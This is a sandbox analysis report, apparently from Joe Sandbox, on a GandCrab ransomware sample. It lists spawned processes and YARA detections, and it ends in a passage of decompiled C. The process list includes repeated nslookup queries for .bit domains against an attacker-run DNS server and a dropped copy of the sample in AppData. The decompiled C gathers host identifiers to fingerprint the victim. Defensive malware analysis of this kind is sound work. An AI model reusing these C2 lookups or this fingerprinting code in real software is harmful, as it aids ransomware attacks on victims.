Yara matches:	Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000001.00000000.253403415.000000000040E000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 5752, Parent PID: 4664

General

Target ID:	5
Start time:	00:01:21
Start date:	01/09/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup nomoreransom.bit dns1.soprodns.ru
Imagebase:	0x2c0000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5460, Parent PID: 5752

General

Target ID:	6
Start time:	00:01:22
Start date:	01/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 484, Parent PID: 4664

General

Target ID:	7
Start time:	00:01:23
Start date:	01/09/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup emsisoft.bit dns1.soprodns.ru
Imagebase:	0x2c0000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1944, Parent PID: 484

General

Target ID:	8
Start time:	00:01:23
Start date:	01/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 5368, Parent PID: 4664

General

Target ID:	9
Start time:	00:01:24
Start date:	01/09/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup gandcrab.bit dns1.soprodns.ru
Imagebase:	0x2c0000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4184, Parent PID: 5368

General

Target ID:	10
Start time:	00:01:25
Start date:	01/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 6080, Parent PID: 4664

General

Target ID:	12
Start time:	00:01:26
Start date:	01/09/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup nomoreransom.bit dns1.soprodns.ru
Imagebase:	0x2c0000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: vkspii.exePID: 6028, Parent PID: 3452

General

Target ID:	13
Start time:	00:01:27
Start date:	01/09/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe"
Imagebase:	0x400000
File size:	75264 bytes
MD5 hash:	551DA842D854798E9D42602EB420BD96
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 0000000D.00000000.288179215.000000000040E000.00000008.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe, Author: Florian Roth Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe, Author: Joe Security Rule: Gandcrab, Description: Gandcrab Payload, Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe, Author: kevoreilly
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5208, Parent PID: 6080

General

Target ID:	14
Start time:	00:01:31
Start date:	01/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 3232, Parent PID: 4664

General

Target ID:	16
Start time:	00:01:33
Start date:	01/09/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup emsisoft.bit dns1.soprodns.ru
Imagebase:	0x2c0000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5816, Parent PID: 3232

General

Target ID:	18
Start time:	00:01:33
Start date:	01/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: vkspii.exePID: 4024, Parent PID: 3452

General

Target ID:	21
Start time:	00:01:35
Start date:	01/09/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe"
Imagebase:	0x400000
File size:	75264 bytes
MD5 hash:	551DA842D854798E9D42602EB420BD96
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000015.00000000.302558828.000000000040E000.00000008.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 3460, Parent PID: 4664

General

Target ID:	24
Start time:	00:01:37
Start date:	01/09/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup gandcrab.bit dns1.soprodns.ru
Imagebase:	0x2c0000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3880, Parent PID: 3460

General

Target ID:	25
Start time:	00:01:37
Start date:	01/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 408, Parent PID: 4664

General

Target ID:	26
Start time:	00:01:38
Start date:	01/09/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup nomoreransom.bit dns1.soprodns.ru
Imagebase:	0x2c0000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5920, Parent PID: 408

General

Target ID:	27
Start time:	00:01:39
Start date:	01/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 996, Parent PID: 4664

General

Target ID:	29
Start time:	00:01:40
Start date:	01/09/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup emsisoft.bit dns1.soprodns.ru
Imagebase:	0x2c0000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5116, Parent PID: 996

General

Target ID:	30
Start time:	00:01:40
Start date:	01/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff651c80000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 5780, Parent PID: 4664

General

Target ID:	31
Start time:	00:01:41
Start date:	01/09/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup gandcrab.bit dns1.soprodns.ru
Imagebase:	0x2c0000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5360, Parent PID: 5780

General

Target ID:	32
Start time:	00:01:42
Start date:	01/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 5880, Parent PID: 4664

General

Target ID:	33
Start time:	00:01:42
Start date:	01/09/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup nomoreransom.bit dns1.soprodns.ru
Imagebase:	0x2c0000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4272, Parent PID: 5880

General

Target ID:	34
Start time:	00:01:43
Start date:	01/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 4948, Parent PID: 4664

General

Target ID:	35
Start time:	00:01:44
Start date:	01/09/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup emsisoft.bit dns1.soprodns.ru
Imagebase:	0x2c0000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1328, Parent PID: 4948

General

Target ID:	36
Start time:	00:01:45
Start date:	01/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 6064, Parent PID: 4664

General

Target ID:	37
Start time:	00:01:45
Start date:	01/09/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup gandcrab.bit dns1.soprodns.ru
Imagebase:	0x2c0000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1976, Parent PID: 6064

General

Target ID:	39
Start time:	00:01:46
Start date:	01/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 5784, Parent PID: 4664

General

Target ID:	41
Start time:	00:01:50
Start date:	01/09/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup nomoreransom.bit dns1.soprodns.ru
Imagebase:	0x2c0000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5956, Parent PID: 5784

General

Target ID:	42
Start time:	00:01:50
Start date:	01/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 2516, Parent PID: 4664

General

Target ID:	43
Start time:	00:01:52
Start date:	01/09/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup emsisoft.bit dns1.soprodns.ru
Imagebase:	0x2c0000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3184, Parent PID: 2516

General

Target ID:	44
Start time:	00:01:52
Start date:	01/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 576, Parent PID: 4664

General

Target ID:	45
Start time:	00:01:53
Start date:	01/09/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup gandcrab.bit dns1.soprodns.ru
Imagebase:	0x2c0000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5500, Parent PID: 576

General

Target ID:	46
Start time:	00:01:54
Start date:	01/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 5964, Parent PID: 4664

General

Target ID:	47
Start time:	00:01:56
Start date:	01/09/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup nomoreransom.bit dns1.soprodns.ru
Imagebase:	0x2c0000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5972, Parent PID: 5964

General

Target ID:	48
Start time:	00:01:57
Start date:	01/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75a330000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 4512, Parent PID: 4664

General

Target ID:	49
Start time:	00:01:58
Start date:	01/09/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup emsisoft.bit dns1.soprodns.ru
Imagebase:	0x2c0000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1360, Parent PID: 4512

General

Target ID:	50
Start time:	00:01:58
Start date:	01/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 1556, Parent PID: 4664

General

Target ID:	51
Start time:	00:01:59
Start date:	01/09/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup gandcrab.bit dns1.soprodns.ru
Imagebase:	0x2c0000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 2140, Parent PID: 1556

General

Target ID:	52
Start time:	00:01:59
Start date:	01/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 2764, Parent PID: 4664

General

Target ID:	53
Start time:	00:02:00
Start date:	01/09/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup nomoreransom.bit dns1.soprodns.ru
Imagebase:	0x2c0000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4820, Parent PID: 2764

General

Target ID:	54
Start time:	00:02:01
Start date:	01/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 4272, Parent PID: 4664

General

Target ID:	55
Start time:	00:02:01
Start date:	01/09/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup emsisoft.bit dns1.soprodns.ru
Imagebase:	0x2c0000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3184, Parent PID: 4272

General

Target ID:	56
Start time:	00:02:02
Start date:	01/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 5236, Parent PID: 4664

General

Target ID:	57
Start time:	00:02:03
Start date:	01/09/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup gandcrab.bit dns1.soprodns.ru
Imagebase:	0x2c0000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4996, Parent PID: 5236

General

Target ID:	58
Start time:	00:02:04
Start date:	01/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: nslookup.exePID: 5708, Parent PID: 4664

General

Target ID:	60
Start time:	00:02:10
Start date:	01/09/2022
Path:	C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit):	true
Commandline:	nslookup nomoreransom.bit dns1.soprodns.ru
Imagebase:	0x2c0000
File size:	78336 bytes
MD5 hash:	8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3196, Parent PID: 5708

General

Target ID:	61
Start time:	00:02:11
Start date:	01/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: 9gkAKTWOXp.exePID: 4664, Parent PID: 3920COMMON

Execution Graph

Execution Coverage:	30.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	41.4%
Total number of Nodes:	708
Total number of Limit Nodes:	17

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00406D90 Relevance: 154.6, APIs: 62, Strings: 26, Instructions: 551
registrymemorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E00406D90(char* __ecx) {
				WCHAR* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				int _v28;
				int _v32;
				short _v36;
				short _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				signed short _v76;
				char _v132;
				void* _t182;
				long _t183;
				WCHAR* _t185;
				short _t186;
				short _t187;
				short _t188;
				signed int _t189;
				signed int _t192;
				signed int _t194;
				int _t206;
				void* _t209;
				signed int _t211;
				signed int _t214;
				WCHAR* _t218;
				WCHAR* _t219;
				long _t228;
				_Unknown_base(*)()* _t233;
				long _t242;
				signed int _t245;
				intOrPtr _t250;
				WCHAR* _t252;
				WCHAR* _t254;
				long _t256;
				long _t260;
				void* _t263;
				WCHAR* _t265;
				long _t268;
				WCHAR* _t269;
				long _t273;
				void* _t278;
				long _t280;
				long _t283;
				WCHAR* _t286;
				void* _t287;
				WCHAR* _t289;
				WCHAR* _t290;
				WCHAR* _t292;
				DWORD* _t296;
				char* _t300;
				short* _t301;
				DWORD* _t307;
				signed int _t310;
				void* _t314;
				char* _t316;
				char* _t318;
				void* _t319;
				void* _t320;

				_t300 = __ecx;
				_t318 = __ecx;
				if( *__ecx != 0) {
					_t292 = VirtualAlloc(0, 0x202, 0x3000, 4); // executed
					_t300 =  &_v28;
					 *(_t318 + 8) = _t292;
					_v28 = 0x100;
					GetUserNameW(_t292, _t300); // executed
				}
				if( *((intOrPtr*)(_t318 + 0xc)) != 0) {
					_v28 = 0x1e;
					_t290 = VirtualAlloc(0, 0x20, 0x3000, 4); // executed
					_t300 =  &_v28;
					 *(_t318 + 0x14) = _t290;
					GetComputerNameW(_t290, _t300);
				}
				if( *((intOrPtr*)(_t318 + 0x18)) == 0) {
					L11:
					if( *(_t318 + 0x30) == 0) {
						L18:
						if( *((intOrPtr*)(_t318 + 0x3c)) == 0) {
							L35:
							if( *((intOrPtr*)(_t318 + 0x48)) == 0) {
								L42:
								if( *((intOrPtr*)(_t318 + 0x54)) == 0) {
									L51:
									if( *((intOrPtr*)(_t318 + 0x24)) != 0) {
										_v32 = 0;
										_t250 = E00407520(_t318 + 0x2c,  &_v32); // executed
										if(_t250 == 0) {
											 *((intOrPtr*)(_t318 + 0x24)) = _t250;
										}
									}
									if( *((intOrPtr*)(_t318 + 0x60)) != 0) {
										_t218 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
										 *(_t318 + 0x68) = _t218;
										_t219 = VirtualAlloc(0, 0xe0c, 0x3000, 4); // executed
										_v16 = _t219;
										_t81 =  &(_t219[0x306]); // 0x60c
										_v8 = _t81;
										GetWindowsDirectoryW(_t219, 0x100);
										_t300 = _v16;
										_t300[6] = 0;
										_t85 =  &(_t300[0x600]); // 0x600
										_t307 = _t85;
										_t86 =  &(_t300[0x400]); // 0x400
										_v20 = _t307;
										_t88 =  &(_t300[0x604]); // 0x604
										_t89 =  &(_t300[0x608]); // 0x608
										_t90 =  &(_t300[0x200]); // 0x200
										GetVolumeInformationW(_t300, _t90, 0x100, _t307, _t89, _t88, _t86, 0x100); // executed
										_v24 = 0;
										_t228 = RegOpenKeyExW(0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", 0, 0x20019,  &_v28); // executed
										if(_t228 == 0) {
											_t300 = _v8;
											_v32 = 0x80;
											_t242 = RegQueryValueExW(_v28, L"ProcessorNameString", 0, 0, _t300,  &_v32); // executed
											if(_t242 != 0) {
												GetLastError();
											} else {
												_v24 = 1;
											}
											RegCloseKey(_v28);
											if(_v24 != 0) {
												_t245 = lstrlenW(_v8);
												_t300 = _v8;
												_push(_t300);
												E00406D10(_t300, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"Identifier", _t300 + _t245 * 2, 0x80); // executed
											}
										}
										wsprintfW( *(_t318 + 0x68), L"%d",  *_v20);
										_t320 = _t320 + 0xc;
										lstrcatW( *(_t318 + 0x68), _v8);
										_t233 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlComputeCrc32");
										_v32 = _t233;
										if(_t233 == 0) {
											 *(_t318 + 0x6c) = 0;
										} else {
